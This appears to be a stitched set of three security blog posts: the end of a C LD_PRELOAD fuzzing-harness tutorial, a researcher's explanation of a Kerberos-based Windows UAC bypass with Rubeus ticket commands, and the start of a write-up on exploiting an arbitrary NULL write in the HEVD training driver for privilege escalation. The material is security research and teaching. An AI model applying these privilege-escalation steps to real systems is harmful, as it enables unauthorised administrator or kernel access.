    // Declare prototype for the real __fxstat
    typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
    __fxstat_t real_fxstat = NULL;
    
    ...
    
    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        printf("** __fxstat() called for __filedesc: %d\n", __filedesc);
        exit(0);
    }
    

    Now we also still have that fcntl() to deal with, luckily that hook is straightforward, if someone asks for the F_GETFD aka, the flags associated with that special 1337 file descriptor, we’ll simply return O_RDONLY as those were the flags it was “opened” with, and we’ll just panic for now if someone calls it for a different file descriptor. This hook looks like this:

    // Declare prototype for the real __fcntl
    typedef int (*fcntl_t)(int fildes, int cmd, ...);
    fcntl_t real_fcntl = NULL;
    
    ...
    
    // Hook for fcntl
    int fcntl(int fildes, int cmd, ...) {
        // Resolve fcntl symbol if needed
        if (NULL == real_fcntl) {
            real_fcntl = _resolve_symbol("fcntl");
        }
    
        if (fildes == 1337) {
            return O_RDONLY;
        }
    
        else {
            printf("** fcntl() called for real file descriptor\n");
            exit(0);
        }
    }
    

    Running this under strace now, the fcntl() call is absent as we would expect:

    openat(AT_FDCWD, "/usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache", O_RDONLY) = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=26376, ...}) = 0
    mmap(NULL, 26376, PROT_READ, MAP_SHARED, 3, 0) = 0x7ff61d331000
    close(3)                                = 0
    prlimit64(0, RLIMIT_NOFILE, NULL, {rlim_cur=4*1024, rlim_max=4*1024}) = 0
    fstat(1, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
    write(1, "** __fxstat() called for __filed"..., 42) = 42
    exit_group(0)                           = ?
    +++ exited with 0 +++
    

    Now we can flesh out our __fxstat() hook with some logic. The caller is hoping to retrieve a stat struct from the function for our fuzzing target fuzzme by passing the special file descriptor 1337. Luckily, we have our global stat struct that we can return after we update its size to match that of the current input in memory (as tracked by us and the fuzzer as the value at INPUT_SIZE_ADDR). So if called, we simply update our stat struct size, and memcpy our struct into their *__stat_buf. Our complete hook now looks like this:

    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        // Resolve the real fxstat
        if (NULL == real_fxstat) {
            real_fxstat = _resolve_symbol("__fxstat");
        }
    
        int ret = -1;
    
        // Check to see if we're stat'ing our fuzz target
        if (1337 == __filedesc) {
            // Patch the global struct with current input size
            st.st_size = *(size_t*)INPUT_SZ_ADDR;
    
            // Copy global stat struct back to caller
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Normal stat, send to real fxstat
        else {
            ret = real_fxstat(__ver, __filedesc, __stat_buf);
        }
    
        return ret;
    }
    

    Now if we run this, we actually don’t break and objdump is able exit cleanly under strace.

    Wrapping Up

    To test whether or not we have done a fair job, we will go ahead and output objdump -D fuzzme to a file, and then we’ll go ahead and output the same command but with our harness shared object loaded. Lastly, we’ll run objdump -D /bin/ed and output to a file to see if our harness created the same output.

    [email protected]:~/blogpost$ objdump -D fuzzme > /tmp/fuzzme_original.txt      
    [email protected]:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/harness.txt 
    [email protected]:~/blogpost$ objdump -D /bin/ed > /tmp/ed.txt
    

    Then we sha1sum the files:

    [email protected]:~/blogpost$ sha1sum /tmp/fuzzme_original.txt /tmp/harness.txt /tmp/ed.txt 
    938518c86301ab00ddf6a3ef528d7610fa3fd05a  /tmp/fuzzme_original.txt
    add4e6c3c298733f48fbfe143caee79445c2f196  /tmp/harness.txt
    10454308b672022b40f6ce5e32a6217612b462c8  /tmp/ed.txt
    

    We actually get three different hashes, we wanted the harness and /bin/ed to output the same output since /bin/ed is the input we loaded into memory.

    [email protected]:~/blogpost$ ls -laht /tmp
    total 14M
    drwxrwxrwt 28 root   root   128K Apr  3 08:44 .
    -rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 ed.txt
    -rw-rw-r--  1 h0mbre h0mbre 736K Apr  3 08:43 harness.txt
    -rw-rw-r--  1 h0mbre h0mbre 2.2M Apr  3 08:42 fuzzme_original.txt
    

    Ah, they are the same length at least, that must mean there is a subtle difference and diff shows us why the hashes aren’t the same:

    [email protected]:~/blogpost$ diff /tmp/ed.txt /tmp/harness.txt 
    2c2
    < /bin/ed:     file format elf64-x86-64
    ---
    > fuzzme:     file format elf64-x86-64
    

    The name of the file in the argv[] array is different, so that’s the only difference. In the end we were able to feed objdump an input file, but have it actually take input from an in-memory buffer in our harness.

    One more thing, we actually forgot that objdump closes our file didn’t we! So I went ahead and added a quick fclose() hook. We wouldn’t have any problems if fclose() just wanted to free the heap memory associated with our fmemopen() returned FILE *; however, it would also probably try to call close() on that wonky file descriptor as well and we don’t want that. It might not even matter in the end, just want to be safe. Up to the reader to experiment and see what changes. The imaginary fuzzer should restore FILE * heap memory anyways during its snapshot restoration routine.

    Conclusion

    There are a million different ways to accomplish this goal, I just wanted to walk you through my thought process. There are actually a lot of cool things you can do with this harness, one thing I’ve done is actually hook malloc() to fail on large allocations so that I don’t waste fuzzing cycles on things that will eventually timeout. You can also create an at_exit() choke point so that no matter what, the program executes your at_exit() function every time it is exiting which can be useful for snapshot resets if the program can take multiple exit paths as you only have to cover the one exit point.

    Hopefully this was useful to some! The complete code to the harness is below, happy fuzzing!

    /* 
    Compiler flags: 
    gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
    */
    
    #define _GNU_SOURCE     /* dlsym */
    #include <stdio.h> /* printf */
    #include <sys/stat.h> /* stat */
    #include <stdlib.h> /* exit */
    #include <unistd.h> /* __xstat, __fxstat */
    #include <dlfcn.h> /* dlsym and friends */
    #include <sys/mman.h> /* mmap */
    #include <string.h> /* memset */
    #include <fcntl.h> /* open */
    
    // Filename of the input file we're trying to emulate
    #define FUZZ_TARGET     "fuzzme"
    
    // Definitions for our in-memory inputs 
    #define INPUT_SZ_ADDR   0x1336000
    #define INPUT_ADDR      0x1337000
    #define MAX_INPUT_SZ    (1024 * 1024)
    
    // For testing purposes, we read /bin/ed into our input buffer to simulate
    // what the fuzzer would do
    #define  TEST_FILE      "/bin/ed"
    
    // Our "legit" global stat struct
    struct stat st;
    
    // FILE * returned to callers of fopen64() 
    FILE *faked_fp = NULL;
    
    // Declare a prototype for the real stat as a function pointer
    typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
    __xstat_t real_xstat = NULL;
    
    // Declare prototype for the real fopen and its friend fopen64 
    typedef FILE* (*fopen_t)(const char* pathname, const char* mode);
    fopen_t real_fopen = NULL;
    
    typedef FILE* (*fopen64_t)(const char* pathname, const char* mode);
    fopen64_t real_fopen64 = NULL;
    
    // Declare prototype for the real __fxstat
    typedef int (*__fxstat_t)(int __ver, int __filedesc, struct stat *__stat_buf);
    __fxstat_t real_fxstat = NULL;
    
    // Declare prototype for the real __fcntl
    typedef int (*fcntl_t)(int fildes, int cmd, ...);
    fcntl_t real_fcntl = NULL;
    
    // Returns memory address of *next* location of symbol in library search order
    static void *_resolve_symbol(const char *symbol) {
        // Clear previous errors
        dlerror();
    
        // Get symbol address
        void* addr = dlsym(RTLD_NEXT, symbol);
    
        // Check for error
        char* err = NULL;
        err = dlerror();
        if (err) {
            addr = NULL;
            printf("** Err resolving '%s' addr: %s\n", symbol, err);
            exit(-1);
        }
        
        return addr;
    }
    
    // Hook for __xstat 
    int __xstat(int __ver, const char* __filename, struct stat* __stat_buf) {
        // Resolve the real __xstat() on demand and maybe multiple times!
        if (!real_xstat) {
            real_xstat = _resolve_symbol("__xstat");
        }
    
        // Assume the worst, always
        int ret = -1;
    
        // Special __ver value check to see if we're calling from constructor
        if (0x1337 == __ver) {
            // Patch back up the version value before sending to real xstat
            __ver = 1;
    
            ret = real_xstat(__ver, __filename, __stat_buf);
    
            // Set the real_xstat back to NULL
            real_xstat = NULL;
            return ret;
        }
    
        // Determine if we're stat'ing our fuzzing target
        if (!strcmp(__filename, FUZZ_TARGET)) {
            // Update our global stat struct
            st.st_size = *(size_t *)INPUT_SZ_ADDR;
    
            // Send it back to the caller, skip syscall
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Just a normal stat, send to real xstat
        else {
            ret = real_xstat(__ver, __filename, __stat_buf);
        }
    
        return ret;
    }
    
    // Exploratory hooks to see if we're using fopen() related functions to open
    // our input file
    FILE* fopen(const char* pathname, const char* mode) {
        printf("** fopen() called for '%s'\n", pathname);
        exit(0);
    }
    
    // Our fopen hook, return a FILE* to the caller, also, if we are opening our
    // target make sure we're not able to write to the file
    FILE* fopen64(const char* pathname, const char* mode) {
        // Resolve symbol on demand and only once
        if (NULL == real_fopen64) {
            real_fopen64 = _resolve_symbol("fopen64");
        }
    
        // Check to see what file we're opening
        FILE* ret = NULL;
        if (!strcmp(FUZZ_TARGET, pathname)) {
            // We're trying to open our file, make sure it's a read-only mode
            if (strcmp(mode, "r")) {
                printf("** Attempt to open fuzz-target in illegal mode: '%s'\n", mode);
                exit(-1);
            }
    
            // Open shared memory FILE* and return to caller
            ret = fmemopen((void*)INPUT_ADDR, *(size_t*)INPUT_SZ_ADDR, mode);
            
            // Make sure we've never fopen()'d our fuzzing target before
            if (faked_fp) {
                printf("** Attempting to fopen64() fuzzing target more than once\n");
                exit(-1);
            }
    
            // Update faked_fp
            faked_fp = ret;
    
            // Change the filedes to something we know
            ret->_fileno = 1337;
        }
    
        // We're not opening our file, send to regular fopen
        else {
            ret = real_fopen64(pathname, mode);
        }
    
        // Return FILE stream ptr to caller
        return ret;
    }
    
    // Hook for __fxstat
    int __fxstat (int __ver, int __filedesc, struct stat *__stat_buf) {
        // Resolve the real fxstat
        if (NULL == real_fxstat) {
            real_fxstat = _resolve_symbol("__fxstat");
        }
    
        int ret = -1;
    
        // Check to see if we're stat'ing our fuzz target
        if (1337 == __filedesc) {
            // Patch the global struct with current input size
            st.st_size = *(size_t*)INPUT_SZ_ADDR;
    
            // Copy global stat struct back to caller
            memcpy(__stat_buf, &st, sizeof(struct stat));
            ret = 0;
        }
    
        // Normal stat, send to real fxstat
        else {
            ret = real_fxstat(__ver, __filedesc, __stat_buf);
        }
    
        return ret;
    }
    
    // Hook for fcntl
    int fcntl(int fildes, int cmd, ...) {
        // Resolve fcntl symbol if needed
        if (NULL == real_fcntl) {
            real_fcntl = _resolve_symbol("fcntl");
        }
    
        if (fildes == 1337) {
            return O_RDONLY;
        }
    
        else {
            printf("** fcntl() called for real file descriptor\n");
            exit(0);
        }
    }
    
    // Map memory to hold our inputs in memory and information about their size
    static void _create_mem_mappings(void) {
        void *result = NULL;
    
        // Map the page to hold the input size
        result = mmap(
            (void *)(INPUT_SZ_ADDR),
            sizeof(size_t),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_SZ_ADDR)) {
            printf("** Err mapping INPUT_SZ_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Let's actually initialize the value at the input size location as well
        *(size_t *)INPUT_SZ_ADDR = 0;
    
        // Map the pages to hold the input contents
        result = mmap(
            (void *)(INPUT_ADDR),
            (size_t)(MAX_INPUT_SZ),
            PROT_READ | PROT_WRITE,
            MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
            0,
            0
        );
        if ((MAP_FAILED == result) || (result != (void *)INPUT_ADDR)) {
            printf("** Err mapping INPUT_ADDR, mapped @ %p\n", result);
            exit(-1);
        }
    
        // Init the value
        memset((void *)INPUT_ADDR, 0, (size_t)MAX_INPUT_SZ);
    }
    
    // Create a "legit" stat struct globally to pass to callers
    static void _setup_stat_struct(void) {
        int result = __xstat(0x1337, FUZZ_TARGET, &st);
        if (-1 == result) {
            printf("** Err creating stat struct for '%s' during load\n", FUZZ_TARGET);
        }
    }
    
    // Used for testing, load /bin/ed into the input buffer and update its size info
    #ifdef TEST
    static void _test_func(void) {    
        // Open TEST_FILE for reading
        int fd = open(TEST_FILE, O_RDONLY);
        if (-1 == fd) {
            printf("** Failed to open '%s' during test\n", TEST_FILE);
            exit(-1);
        }
    
        // Attempt to read max input buf size
        ssize_t bytes = read(fd, (void*)INPUT_ADDR, (size_t)MAX_INPUT_SZ);
        close(fd);
    
        // Update the input size
        *(size_t *)INPUT_SZ_ADDR = (size_t)bytes;
    }
    #endif
    
    // Routine to be called when our shared object is loaded
    __attribute__((constructor)) static void _hook_load(void) {
        // Create memory mappings to hold our input and information about its size
        _create_mem_mappings();
    
        // Setup global "legit" stat struct
        _setup_stat_struct();
    
        // If we're testing, load /bin/ed up into our input buffer and update size
    #ifdef TEST
        _test_func();
    #endif
    }
    

    Bypassing UAC in the most Complex Way Possible!

    20 March 2022 at 09:52

    While it's not something I spend much time on, finding a new way to bypass UAC is always amusing. When reading through some of the features of the Rubeus tool I realised that there was a possible way of abusing Kerberos to bypass UAC, well on domain joined systems at least. It's unclear if this has been documented before, this post seems to discuss something similar but relies on doing the UAC bypass from another system, but what I'm going to describe works locally. Even if it has been described as a technique before I'm not sure it's been documented how it works under the hood.

    The Background!

    Let's start with how the system prevents you bypassing the most pointless security feature ever. By default LSASS will filter any network authentication tokens to remove admin privileges if the users is a local administrator. However there's an important exception, if the user a domain user and a local administrator then LSASS will allow the network authentication to use the full administrator token. This is a problem if say you're using Kerberos to authenticate locally. Wouldn't this be a trivial UAC bypass? Just authenticate to the local service as a domain user and you'd get the network token which would bypass the filtering?

    Well no, Kerberos has specific additions to block this attack vector. If I was being charitable I'd say this behaviour also ensures some level of safety.  If you're not running as the admin token then accessing say the SMB loopback interface shouldn't suddenly grant you administrator privileges through which you might accidentally destroy your system.

    Back in January last year I read a post from Steve Syfuhs of Microsoft on how Kerberos prevents this local UAC bypass. The TL;DR; is when a user wants to get a Kerberos ticket for a service LSASS will send a TGS-REQ request to the KDC. In the request it'll embed some security information which indicates the user is local. This information will be embedded in the generated ticket. 

    When that ticket is used to authenticate to the same system Kerberos can extract the information and see if it matches one it knows about. If so it'll take that information and realize that the user is not elevated and filter the token appropriately. Unfortunately much as enjoy Steve's posts this one was especially light on details. I guessed I'd have to track down how it works myself. Let's dump the contents of a Kerberos ticket and see if we can see what could be the ticket information:

    PS> $c = New-LsaCredentialHandle -Package 'Kerberos' -UseFlag Outbound
    PS> $x = New-LsaClientContext -CredHandle $c -Target HOST/$env:COMPUTERNAME
    PS> $key = Get-KerberosKey -HexKey 'XXX' -KeyType AES256_CTS_HMAC_SHA1_96 -Principal $env:COMPTUERNAME
    PS> $u = Unprotect-LsaAuthToken -Token $x.Token -Key $key
    PS> Format-LsaAuthToken $u

    <KerberosV5 KRB_AP_REQ>
    Options         : None
    <Ticket>
    Ticket Version  : 5
    ...

    <Authorization Data - KERB_AD_RESTRICTION_ENTRY>
    Flags           : LimitedToken
    Integrity Level : Medium
    Machine ID      : 6640665F...

    <Authorization Data - KERB_LOCAL>
    Security Context: 60CE03337E01000025FC763900000000

    I've highlighted the two ones of interest, the KERB-AD-RESTRICTION-ENTRY and the KERB-LOCAL entry. Of course I didn't guess these names, these are sort of documented in the Microsoft Kerberos Protocol Extensions (MS-KILE) specification. The KERB_AD_RESTRICTION_ENTRY is most obviously of interest, it contains both the works "LimitedToken" and "Medium Integrity Level"

    When accepting a Kerberos AP-REQ from a network client via SSPI the Kerberos module in LSASS will call the LSA function LsaISetSupplementalTokenInfo to apply the information from KERB-AD-RESTRICTION-ENTRY to the token if needed. The pertinent code is roughly the following:

    NTSTATUS LsaISetSupplementalTokenInfo(PHANDLE phToken, 
                            PLSAP_TOKEN_INFO_INTEGRITY pTokenInfo) {
      // ...
      BOOL bLoopback = FALSE:
      BOOL bFilterNetworkTokens = FALSE;

      if (!memcmp(&LsapGlobalMachineID, pTokenInfo->MachineID,
           sizeof(LsapGlobalMachineID))) {
        bLoopback = TRUE;
      }

      if (LsapGlobalFilterNetworkAuthenticationTokens) {
        if (pTokenInfo->Flags & LimitedToken) {
          bFilterToken = TRUE;
        }
      }

      PSID user = GetUserSid(*phToken);
      if (!RtlEqualPrefixSid(LsapAccountDomainMemberSid, user)
        || LsapGlobalLocalAccountTokenFilterPolicy 
        || NegProductType == NtProductLanManNt) {
        if ( !bFilterToken && !bLoopback )
          return STATUS_SUCCESS;
      }

      /// Filter token if needed and drop integrity level.
    }

    I've highlighted the three main checks in this function, the first compares if the MachineID field of the KERB-AD-RESTRICTION-ENTRY matches the one stored in LSASS. If it is then the bLoopback flag is set. Then it checks an AFAIK undocumented LSA flag to filter all network tokens, at which point it'll check for the LimitedToken flag and set the bFilterToken flag accordingly. This filtering mode defaults to off so in general bFilterToken won't be set.

    Finally the code queries for the current created token SID and checks if any of the following is true:
    • The user SID is not a member of the local account domain.
    • The LocalAccountTokenFilterPolicy LSA policy is non-zero, which disables the local account filtering.
    • The product type is NtProductLanManNt, which actually corresponds to a domain controller.
    If any are true then as long as the token information is neither loopback or filtering is forced the function will return success and no filtering will take place. Therefore in a default installation for a domain user to not be filtered comes down whether the machine ID matches or not. 

    For the integrity level, if filtering is taking place then it will be dropped to the value in the KERB-AD-RESTRICTION-ENTRY authentication data. However it won't increase the integrity level above what the created token has by default, so this can't be abused to get System integrity.

    Note Kerberos will call LsaISetSupplementalTokenInfo with the KERB-AD-RESTRICTION-ENTRY authentication data from the ticket in the AP-REQ first. If that doesn't exist then it'll try calling it with the entry from the authenticator. If neither the ticket or authenticator has an entry then it will never be called. How can we remove these values?

    Well, about that!

    Okay how can we abuse this to bypass UAC? Assuming you're authenticated as a domain user the funniest way to abuse it is get the machine ID check to fail. How would we do that? The LsapGlobalMachineID value is a random value generated when LSASS starts up. We can abuse the fact that if you query the user's local Kerberos ticket cache it will return the session key for service tickets even if you're not an administrator (it won't return TGT session keys by default).

    Therefore one approach is to generate a service ticket for the local system, save the resulting KRB-CRED to disk, reboot the system to get LSASS to reinitialize and then when back on the system reload the ticket. This ticket will now have a different machine ID and therefore Kerberos will ignore the restrictions entry. You could do it with the builtin klist and Rubeus with the following commands:

    PS> klist get RPC/$env:COMPUTERNAME
    PS> Rubeus.exe /dump /server:$env:COMPUTERNAME /nowrap
    ... Copy the base64 ticket to a file.

    Reboot then:

    PS> Rubeus.exe ptt /ticket:<BASE64 TICKET> 

    You can use Kerberos authentication to access the SCM over named pipes or TCP using the RPC/HOSTNAME SPN.  Note the Win32 APIs for the SCM always use Negotiate authentication which throws a spanner in the works, but there are alternative RPC clients ;-) While LSASS will add a valid restrictions entry to the authenticator in the AP-REQ it won't be used as the one in the ticket will be used first which will fail to apply due to the different machine ID.

    The other approach is to generate our own ticket, but won't we need credentials for that? There's a trick, I believe discovered by Benjamin Delpy and put into kekeo that allows you to abuse unconstrained delegation to get a local TGT with a session key. With this TGT you can generate your own service tickets, so you can do the following:
    1. Query for the user's TGT using the delegation trick.
    2. Make a request to the KDC for a new service ticket for the local machine using the TGT. Add a KERB-AD-RESTRICTION-ENTRY but fill in a bogus machine ID.
    3. Import the service ticket into the cache.
    4. Access the SCM to bypass UAC.
    Ultimately this is a reasonable amount lot of code for a UAC bypass, at least compared to the just changing an environment variable. However, you can probably bodge it together using existing tools such as kekeo and Rubeus, but I'm not going to release a turn key tool to do this, you're on your own :-)

    Didn't you forget KERB-LOCAL?

    What is the purpose of KERB-LOCAL? It's a way of reusing the local user's credentials, this is similar to NTLM loopback where LSASS is able to determine that the call is actually from a locally authenticated user and use their interactive token. The value passed in the ticket and authenticator can be checked against a list of known credentials in the Kerberos package and if there's a match the existing token will be used.

    Would this not always eliminate the need for the filtering the token based on the KERB-AD-RESTRICTION-ENTRY value? It seems that this behavior is used very infrequently due to how it's designed. First it only works if the accepting server is using the Negotiate package, it doesn't work if using the Kerberos package directly (sort of...). That's usually not an impediment as most local services use Negotiate anyway for convenience. 

    The real problem is that as a rule if you use Negotiate to the local machine as a client it'll select NTLM as the default. This will use the loopback already built into NTLM rather than Kerberos so this feature won't be used. Note that even if NTLM is disabled globally on the domain network it will still work for local loopback authentication. I guess KERB-LOCAL was added for feature parity with NTLM.

    Going back to the formatted ticket at the start of the blog what does the KERB-LOCAL value mean? It can be unpacked into two 64bit values, 0x17E3303CE60 and 0x3976FC25. The first value is the heap address of the KERB_CREDENTIAL structure in LSASS's heap!! The second value is the ticket count when the KERB-LOCAL structure was created.

    Fortunately LSSAS doesn't just dereference the credentials pointer, it must be in the list of valid credential structures. But the fact that this value isn't blinded or references a randomly generated value seems a mistake as heap addresses would be fairly easy to brute force. Of course it's not quite so simple, Kerberos does verify that the SID in the ticket's PAC matches the SID in the credentials so you can't just spoof the SYSTEM session, but well, I'll leave that as a thought to be going on with.

    Hopefully this gives some more insight into how this feature works and some fun you can have trying to bypass UAC in a new way.

    UPDATE: This simple C++ file can be used to modify the Win32 SCM APIs to use Kerberos for local authentication.

    HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

    18 November 2021 at 19:23

    HackSys Extreme Vulnerable Driver — Arbitrary Write NULL (New Solution)

    A simply (not stealth) method utilizing “NtQuerySystemInformation” for “Arbitrary Write NULL” vulnerabilities

    Today, we’re going to have a deep looking through an interesting exploitation technique using “NtQuerySystemInformation system call in order to achieve a “LPE - (Local Privilege Escalation)” through “HEVD - (Hacksys Extreme Vulnerable Driver)”. The follow content will only show about possibles and functional (but unreliable) techniques and methodologies on how to exploit this common vulnerability type “(Arbitrary Write NULL)” in most of vulnerable drivers (in case you doesn’t have certain tools in order to exploit them). Also, we’ll not cover how to install and configure kernel debugging or “HEVD IOCLT” communication, this write-up is about what i did and how i worked around to get a solution, despite knowledge of other people influenced me and finally the results of final script. Hope Everyone enjoy! =)

    Introduction

    First of all, we need to talk about what is “Arbitrary Write NULL vulnerability, and at kernel perspective, what should be possible to do with it in order to achieve “LPE” in our simplecmd.exe” session from ring3 (user-land)”.

    In short, “Arbitrary Write NULL” is most like “Arbitrary Write” vulnerabilities, the difference behind them, is that the first one allows you to be able to “write->[0x00000000]” in whatever address/pointer you looking for, and the second one, allows you to define explicitly “Write-What-Where”, allowing things like write->[0xdeadbeef], meaning that you have control over value of an address/pointer which will be overflowed with 0xdeadbeef, instead only 0x00000000. At below we are going to have a looking deep in to HEVD driver vulnerable function, dissect and understand what is happening.

    [HEVD]-TriggerWriteNull

    HEVD - https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
    TriggerWriteNULL function which handle kernel user-buffer, and check if it resides in ring3 (user-land).
    Source-code of vulnerable driver function

    As you can see here, “ifdef SECURE” (which is not), “probeForWrite()” function should verify and confirm that our user input buffer is located at “ring3”, otherwise our input buffer with be nullified without properly security checks.

    Reversing Engineering vulnerable function

    As commented, “[edi] register is been overflowed with “0x00000000 by “[ebx]” register as occurs when compiled code wasn’t defined with “#ifdef SECURE” bit set.

    Since IOCTL drive connection is predefined, we can test it and see that our first 4 bytes from user-buffer “(shellcode_ptr)”, is about to be nullified with “0x00000000”.

    Placing a breakpoints on strategic addresses and running it.
    Reading important addresses using WinDBG cmd

    After script run, and hit break-point, we can clearly notice that “[edi]” value contains our address to the pointer of user-buffer address “(shellcode_ptr -> 0x00500000)”.

    Reading important addresses using WinDBG cmd

    As an example, the content of our “shellcode” is storing a piece of “x86 assembly” code to “LPE” our permissions. At your first “4 bytes”, you can see that have the initial parts of our “shellcode” start. Now ignoring the code located there, we’re only looking into “0xa16460cc” address.

    Here, you can see the vulnerability since ebx=0x00000000 is being overwriting our value inside user-buffer eax=0xa16460cc.

    The problem here is obvious, as a simple user “(ring3)”, if we send a whatever address, it will be nullified, no matter what or how, just it will stay “NULL”.

    Said all that, we know from here that we actually only can write “NULL” bytes to our defined address/pointer, and do some magic to achieve LPE from there, but… how can we do that? Let’s talk about DACL & Security Description.

    DACL & Security Description

    First of all, what is “DACLand “Security Description”? how them can be exploited using “Arbitrary Write NULL” vulnerabilities?

    According to https://networkencyclopedia.com/discretionary-access-control-list-dacl/

    What is DACL (Discretionary Access Control List)?
    A DACL stands for Discretionary Access Control List, in Microsoft Windows family, is an internal list attached to an object in Active Directory that specifies which users and groups can access the object and what kinds of operations they can perform on the object. In Windows 2000 and Windows NT, an internal list attached to a file or folder on a volume formatted using the NTFS that has a similar function.
    How DACL works?
    In Windows, each object in Active Directory or a local NTFS volume has an attribute called Security Descriptor that stores information about
    The object’s owner (the security identifier or the owner) and the groups to which the owner belongs.
    The discretionary access control list (DACL) of the object, which lists the security principals (users, groups, and computers) that have access to the object and their level of access.
    The system access control list (SACL), which lists the security principals that should trigger audit events when accessing the list.

    Basically, “DACL” is a list that contains features, one of them are called “Security Description” (we will take deep soon). This list are configured to handle calls and filter what object (files, processes, threads, etc), should be allowed or not for specific (user, groups, or computers). Hard to understand? Let me show up it as “Window UI”. =)

    Maybe this image should be familiar to you right?. This area is one of various that you can manage “DACL & Security Descriptions” easily (without knowing that they actually exists).

    As we can see, isn’t hard to understand what it is and why it was created, the thing is, what defines internally what permissions an user can have on it? What objects are configured in “DACL” to be filtered? let’s have a deep look into “Windows Internals” and his “structs”.

    First of all, let’s take a look at “WinDBG” process list.

    WinDBG processes list

    When we do list our windows processes in “WinDBG”, we can see that every process have the same patterns, only with different values or addresses ranges. In the image above, you can notice a marked address “0x856117c8”, this address represents a windows object, and this object have some important properties which defines: process name, permissions, process ID’s, handles, etc. (i’ll not extend this, so let it just as a simple recap).

    A interesting thing that we can explore at moment, isn’t any else then “nt!_OBJECT_HEADER struct”. This struct have literally what tools we need to work and start our attack.

    Getting nt!_OBJECT_HEADER address from System (PID:4) process
    Viewing information about System (PID:4) process header

    As an image above says, we simply dissect our process utilizing “nt!_OBJECT_HEADER struct”, which gave us information about what is located in our object. Also it’s important to notice that “nt!_OBJECT_HEADER” only look for addresses offsets before nt!_EPROCESS”, which means that “nt!_EPROCESS” range, should stay after those offsets.

    But what happens to SecurityDescription?

    SecurityDescription poiting to 0x8c005e1f

    Another interesting thing is that our SecurityDescription “(0x856117b0+0x014)” is pointing to “0x8c005e1f” address, meaning that something is happening here, and this address have some interaction to “DACL & Security Description” implementations.

    Now, let’s have a deep look in this specific address “0x8c005e1f”.

    Visualizing SecurityDescription struct from System (PID:4) Process

    Utilizing previous target SecurityDescription address with WinDBG command “!sd”, with simple bit calculation, we now are able to understand much better how it’s implementation are configured on Windows Internals. So, those marked value, remember you something? Yes, that’s right, this marks are the users information stored in the process. At image below, we can compare these two DACL information.

    SYSTEM and DAML users (colors compared to last image)

    As we can compared these two images, we notice that “SYSTEM” and “DAML” users, are related to another image about SecurityDescription “(Windows Internals)”. It’s a example (not legit), that how we can compare this two values.

    Knowing that, and understanding the concepts that we actually can nullify any address from “ring0 (kernel)” only as an simple user, let’s try to make SecurityDescription address “(0x856117b0+0x014)” point to “NULL” “(0x00000000)”, and see what happens!

    SecurityDescription poiting to 0x8c005e1f
    Nullifying SecurityDescription Pointer
    Results after nullification of the pointer

    Ok! now “System.exe (PID:4)” process have SecurityDescriptor pointer nullified. Now let’s try to continue our “VM snapshot”.

    Maybe you don’t understand, but it’s written “Do you want close [System] Process?”
    ERROR: DCOM server process launcher service terminated unexpectedly
    Wait, what happened? we closed [System.exe] process manually? and without user permissions for it? using task manager?

    Yes! only “nt authority/SYSTEM” should have permissions to close this process, but how could be possible a simple user “BSODed” whole system? There’s, the magic behind this exploitation is a well-know exploitation technique which nullify SecurityDescription behaviors from SYSTEM processes, it technique is very used for “LPE exploits” since it applies “no permissions” bit for those target processes. In short, from WinDBG we manually nullified the pointer which contains those permissions information in SecurityDescription meaning that “anyone” now can “write/read/execute” in this process. =)

    But there’s a problem here, we now understand what we need to do in order to elaborate our exploit but i ask you, how we can identify “SYSTEM” process objects from a simple “ring3 (user-land)”?

    WinDBG processes list

    In the image above, since we’re looking those addresses from WinDBG screen “ring0 (kernel mode)”, we clearly see the object there, but also we need to know that those values are not accessible (also unpredictable), to our simple user from “ring3 (user-land)”. The randomization of these addresses are implemented every time since “Windows 7” is rebooted “(Address Space Layout Randomization or ASLR)”, these mitigations deny every try to work with static address. Lastly, another important thing is that the randomization by self are unpredictable (in most of my tests), these objects only randomize through “0x85xxxxxx” to “0x87xxxxxx”, which means i actually don’t know if a bypass of this randomization (from ring3), actually exists.

    So, what to do next?

    NtQuerySystemInformation - Handle Leaking Attack

    As mentioned before, isn’t possible to exploit from “ring3 (user-land)” due to a lot of permissions restrictions placed by our target “Operation System (windows 7)”, so what kind of things can we do to bypass these restrictions? the answer is “NtQuerySystemInformation WinAPI call”.

    “NtQuerySystemInformation” by design is one of various security flaws that for “Microsoft” only represents a “feature” to an user perspective. The biggest problem about it “WinAPI call”, is that it’s configured by default to accept user calls (from undocumented behaviors), which should be parsed and queried together ring0 (kernel mode) information, as resulting in an leak of SYSTEM addresses/pointers. This “WinAPI Call”, is a well-know artifice for “memory leaking attacks”, since it’s allow an attacker to know exactly what pointers are important, and elaborate a better methodology for explore his target vulnerability (in our case WriteNULL).

    But how could it be possible to leak information from ring3?

    Before we start to looking deep into vulnerable (features) calls, we should look at first to the definition of “handles”, and why we need to get focus on it.

    according to: https://stackoverflow.com/questions/902967/what-is-a-windows-handle

    It’s an abstract reference value to a resource, often memory or an open file, or a pipe.
    Properly, in Windows, (and generally in computing) a handle is an abstraction which hides a real memory address from the API user, allowing the system to reorganize physical memory transparently to the program. Resolving a handle into a pointer locks the memory, and releasing the handle invalidates the pointer. In this case think of it as an index into a table of pointers… you use the index for the system API calls, and the system can change the pointer in the table at will.
